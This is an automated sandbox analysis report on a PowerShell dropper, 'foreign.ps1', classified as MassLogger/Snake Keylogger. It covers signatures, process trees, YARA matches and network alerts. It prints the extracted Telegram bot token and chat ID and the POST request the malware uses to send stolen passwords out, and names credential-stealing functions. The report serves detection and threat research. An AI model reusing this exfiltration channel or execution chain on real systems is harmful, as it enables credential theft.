Windows Analysis Report
foreign.ps1

Overview

General Information

Sample name: foreign.ps1
Analysis ID: 1615013
MD5: 7fbd0dd0f21baa637b05f5d023d61f60
SHA1: fd4d9e96f9004ca42e1059a437bfc46ceab8d2e0
SHA256: e07a4f21db3fc5195fa7b599ad8082ba0bdc7cd0d443270465a287740aaf281e
Tags: 196-251-92-64, ps1, user-JAMESWT_MHT

Detection

MassLogger RAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Contains functionality to register a low level keyboard hook
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
PE file has nameless sections
Powershell drops PE file
Suspicious execution chain found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 7856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\foreign.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • x.exe (PID: 8140 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: FE308F2EC5C7F2C2C6F414A4F90D7D9F)
      • RegAsm.exe (PID: 8176 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 8184 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • notepad.exe (PID: 8080 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\foreign.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
Malware configuration (MassLogger): {"EXfil Mode": "Telegram", "Telegram Token": "7608006233:AAEa3uE2wUISsAxYhX-rxjPoq2_3Ngaphnc", "Telegram Chatid": "7777620258"}

Source | Rule | Description | Author | Strings
00000006.00000002.3753256474.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
00000006.00000002.3753256474.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
    • 0xb3fb:$a1: get_encryptedPassword
    • 0xb723:$a2: get_encryptedUsername
    • 0xb196:$a3: get_timePasswordChanged
    • 0xb2b7:$a4: get_passwordField
    • 0xb411:$a5: set_encryptedPassword
    • 0xcd5b:$a7: get_logins
    • 0xca0c:$a8: GetOutlookPasswords
    • 0xc7fe:$a9: StartKeylogger
    • 0xccab:$a10: KeyLoggerEventArgs
    • 0xc85b:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
Process Memory Space: powershell.exe PID: 7856 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
      • 0x467c7:$b1: ::WriteAllBytes(
      • 0x6401f:$b1: ::WriteAllBytes(
      • 0x467e3:$b2: ::FromBase64String(
      • 0x6403b:$b2: ::FromBase64String(
Source | Rule | Description | Author | Strings
4.2.x.exe.2d0b410.2.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
4.2.x.exe.2d0b410.2.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
        • 0x97fb:$a1: get_encryptedPassword
        • 0x9b23:$a2: get_encryptedUsername
        • 0x9596:$a3: get_timePasswordChanged
        • 0x96b7:$a4: get_passwordField
        • 0x9811:$a5: set_encryptedPassword
        • 0xb15b:$a7: get_logins
        • 0xae0c:$a8: GetOutlookPasswords
        • 0xabfe:$a9: StartKeylogger
        • 0xb0ab:$a10: KeyLoggerEventArgs
        • 0xac5b:$a11: KeyLoggerEventArgsEventHandler
6.2.RegAsm.exe.400000.0.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
6.2.RegAsm.exe.400000.0.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
          • 0xb5fb:$a1: get_encryptedPassword
          • 0xb923:$a2: get_encryptedUsername
          • 0xb396:$a3: get_timePasswordChanged
          • 0xb4b7:$a4: get_passwordField
          • 0xb611:$a5: set_encryptedPassword
          • 0xcf5b:$a7: get_logins
          • 0xcc0c:$a8: GetOutlookPasswords
          • 0xc9fe:$a9: StartKeylogger
          • 0xceab:$a10: KeyLoggerEventArgs
          • 0xca5b:$a11: KeyLoggerEventArgsEventHandler
4.2.x.exe.2d1ca44.0.unpack | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security

            System Summary

Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\foreign.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\foreign.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\foreign.ps1", ProcessId: 7856, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\foreign.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\foreign.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\foreign.ps1", ProcessId: 7856, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-14T12:24:42.539206+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49770 | 149.154.167.220 | 443 | TCP
2025-02-14T12:24:35.534856+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49726 | 132.226.8.169 | 80 | TCP
2025-02-14T12:24:41.613024+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49726 | 132.226.8.169 | 80 | TCP
2025-02-14T12:24:42.252972+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.11 | 49770 | 149.154.167.220 | 443 | TCP


            AV Detection

Source: C:\Users\user\AppData\Local\Temp\x.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: 00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7608006233:AAEa3uE2wUISsAxYhX-rxjPoq2_3Ngaphnc", "Telegram Chatid": "7777620258"}
Source: C:\Users\user\AppData\Local\Temp\x.exe | ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\x.exe | Virustotal: Detection: 51%
Source: foreign.ps1 | Virustotal: Detection: 47%
Source: foreign.ps1 | ReversingLabs: Detection: 40%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:49732 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49770 version: TLS 1.2
Source: Binary string: BVZXCH33.pdb | source: powershell.exe, 00000000.00000002.1326897223.000000000616E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000000.1311459662.0000000000992000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
Source: Binary string: BVZXCH33.pdb\f | source: powershell.exe, 00000000.00000002.1326897223.000000000616E000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000000.1311459662.0000000000992000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr

            Software Vulnerabilities

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 03065782h | 6_2_03065366
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 030651B9h | 6_2_03064F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 03065782h | 6_2_030656AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 066C037Dh | 6_2_066C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then push 00000000h | 6_2_066CA0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 066C8A6Dh | 6_2_066C8890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 066C93F7h | 6_2_066C8890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 066C79B0h | 6_2_066C7708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then jmp 066C1830h | 6_2_066C1588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] | 6_2_066CAF06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 6_2_066C7D91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, 000003E8h | 6_2_07032F68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then mov ecx, 000003E8h | 6_2_07032F58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then push 00000000h | 6_2_07032C9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then push 00000000h | 6_2_07032148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 6_2_07032148

            Networking

Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49770 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.11:49770 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7608006233:AAEa3uE2wUISsAxYhX-rxjPoq2_3Ngaphnc/sendDocument?chat_id=7777620258&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd4cc04399cd0a | Host: api.telegram.org | Content-Length: 1088 | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 132.226.8.169
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49726 -> 132.226.8.169:80
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.11:49732 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot7608006233:AAEa3uE2wUISsAxYhX-rxjPoq2_3Ngaphnc/sendDocument?chat_id=7777620258&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 | Content-Type: multipart/form-data; boundary================8dd4cc04399cd0a | Host: api.telegram.org | Content-Length: 1088 | Connection: Keep-Alive
Source: RegAsm.exe, 00000006.00000002.3755465000.00000000031D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: x.exe, 00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3753256474.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: powershell.exe, 00000000.00000002.1326897223.000000000616E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1317146695.0000000005256000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1329377219.00000000076B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1317146695.0000000005101000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.00000000031D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1317146695.0000000005256000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1329377219.00000000076B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1317146695.0000000005101000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB_q
Source: RegAsm.exe, 00000006.00000002.3755465000.0000000003211000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: x.exe, 00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3753256474.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: powershell.exe, 00000000.00000002.1326897223.000000000616E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1326897223.000000000616E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1326897223.000000000616E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1317146695.0000000005256000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1329377219.00000000076B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1326897223.000000000616E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: x.exe, 00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3755465000.0000000003200000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.3753256474.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown | Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49770 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 4.2.x.exe.2d0b410.2.raw.unpack, UltraSpeed.cs | .Net Code: VKCodeToUnicode
Source: 4.2.x.exe.2d1ca44.0.raw.unpack, UltraSpeed.cs | .Net Code: VKCodeToUnicode
Source: 4.2.x.exe.2d2e09c.1.raw.unpack, UltraSpeed.cs | .Net Code: VKCodeToUnicode
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_06A333A4 SetWindowsHookExA 0000000D,00000000,00000000,?

            System Summary

Source: 4.2.x.exe.2d0b410.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.x.exe.2d1ca44.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.x.exe.2d2e09c.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.x.exe.2d2e09c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.x.exe.2d1ca44.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.x.exe.2d0b410.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.3753256474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.1327298424.0000000002CD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7856, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: x.exe PID: 8140, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegAsm.exe PID: 8184, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: x.exe.0.dr | Static PE information: section name: (empty)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_02C828D0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_02C80848
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_02C811E0
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_02C828C1
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_02C807D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_0306C168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_0306A7CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_0306CA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_03064F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_03067E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_0306C386
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_0306B9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_03067E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_03064EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_03062DD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066C06A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066CA0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066C3F78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066C4CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066C1A58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066C8890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066C9980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066C76F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066C7708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066C1578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066C1588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066C0023
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066C7D91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066CE8E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066CE8DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066C8881
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_066C9970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_06A3B7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_07030FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_07032148
Source: 4.2.x.exe.2d0b410.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.x.exe.2d1ca44.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.x.exe.2d2e09c.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.x.exe.2d2e09c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.x.exe.2d1ca44.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.x.exe.2d0b410.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.3753256474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
